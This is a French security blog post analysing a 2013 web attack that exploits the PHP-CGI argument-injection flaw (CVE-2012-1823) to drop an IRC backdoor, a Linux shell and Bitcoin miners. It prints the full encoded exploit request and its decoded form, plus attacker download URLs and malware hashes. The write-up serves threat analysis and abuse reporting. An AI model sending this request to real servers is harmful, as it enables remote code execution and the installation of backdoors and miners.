Attaque Web – BitCoin et PHP Shell

Aujourd’hui, la seconde attaque venant d’une IP OVH a attiré mon attention : https://www.malekal.com/modsec/index.php?ip=37.187.77.137

Attaques_WEB_Bitcoin Attaques_WEB_Bitcoin2

 

L’exploit se situe là :

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Décodé on obtient :
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

C’est un exploit qui tire parti d’une vulnérabilité PHP-CGI de Mai 2012 : http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

Du côté des éléments qui sont télécharges et exécutés, on obtient :

http://74.52.9.186/c
http:/74.52.9.186/lol
http://74.52.9.186/x.exe

http://update.cc.st/c  (82.165.130.162)
http:/update.cc.st/lol
http://update.cc.st/x.exe

NetRange: 74.52.0.0 – 74.55.255.255
CIDR: 74.52.0.0/14
OriginAS: AS36420, AS30315, AS13749, AS21844
NetName: NETBLK-THEPLANET-BLK-14
NetHandle: NET-74-52-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-02-17
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-74-52-0-0-1

inetnum: 82.165.128.0 – 82.165.143.255
netname: SCHLUND-CUSTOMERS
descr: 1&1 Internet AG
country: DE
admin-c: IPAD-RIPE
tech-c: IPOP-RIPE
remarks: INFRA-AW
remarks: in case of abuse or spam, please mailto: abuse@oneandone.net
status: ASSIGNED PA
mnt-by: AS8560-MNT
mnt-lower: AS8560-MNT
mnt-domains: AS8560-MNT
mnt-routes: AS8560-MNT
source: RIPE # Filtered

bot est une PHP IRC-Backdoor pour Windows avec des fonctionnalités DoS : http://pjjoint.malekal.com/files.php?read=20131109_r5x6n9m8q12
Apparemment, y a pas grand monde sur le channel.
Sont petit est nom est : Backdoor.PHP.Pbot.A

https://www.virustotal.com/en/file/40ef8427bec53d05194988be086390d75c4ab4e003524191afe5f484d37e2da6/analysis/1384026769/

SHA256: 40ef8427bec53d05194988be086390d75c4ab4e003524191afe5f484d37e2da6
File name: bot
Detection ratio: 12 / 47
Analysis date: 2013-11-09 19:52:49 UTC ( 0 minutes ago )

lol est un binaire Linux qui semble être aussi un Shell.
La détection est pas terrible, on tombe sur du 3/47 : http://malwaredb.malekal.com/index.php?hash=5d0b6cb42b254643c7f0759c41414104

x.exe est un client Bitcoin pour Windows : https://www.virustotal.com/en/file/f70f13232fec2ae5c526b04bbaa455dec0675d32a1068f1c045f6fe92192d53d/analysis/

SHA256: f70f13232fec2ae5c526b04bbaa455dec0675d32a1068f1c045f6fe92192d53d
File name: x.exe
Detection ratio: 25 / 47
Analysis date: 2013-11-08 14:35:57 UTC ( 1 day, 5 hours ago )

il y a aussi un Bitcoin pour Linux : http://malwaredb.malekal.com/index.php?hash=8bcf90e5f865acd004a43f2ba891534b

https://www.virustotal.com/en/file/5be08c4002571d7b8ad03fabef81494d276c2fdd6857c89f7dad88d472acb9b0/analysis/1384024764/

 

SHA256: 5be08c4002571d7b8ad03fabef81494d276c2fdd6857c89f7dad88d472acb9b0
File name: clamav
Detection ratio: 3 / 47
Analysis date: 2013-11-09 19:19:24 UTC ( 0 minutes ago )

Attaques_WEB_Bitcoin3

mine.cc.st est en fastflux :

malekalmorte@MaK-tux:/tmp/attack$ host mine.cc.st
mine.cc.st has address 66.85.187.134
mine.cc.st has address 46.105.55.208
malekalmorte@MaK-tux:/tmp/attack$ host mine.cc.st
mine.cc.st has address 46.105.55.208
mine.cc.st has address 66.85.187.134

Cette attaque est plutôt originale par rapport aux traditionnels RFI qui ballourde un fichier d’upload ou un PHP Shell : https://www.malekal.com/2013/10/03/attaques-rfi-remote-file-include-sur-wordpress/
Je vais envoyer quelques mails aux abuses 🙂

EDIT

is that you ?

bla-DoS

Sécuriser son site WEB

Vous pouvez aussi jeter un oeil à la page : [réseau] Sécuriser un serveur Apache/PHP/MySQL (LAMP) et l’index menant à différentes ressources pour sécuriser son site WEB

Print Friendly
(Visité 189 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet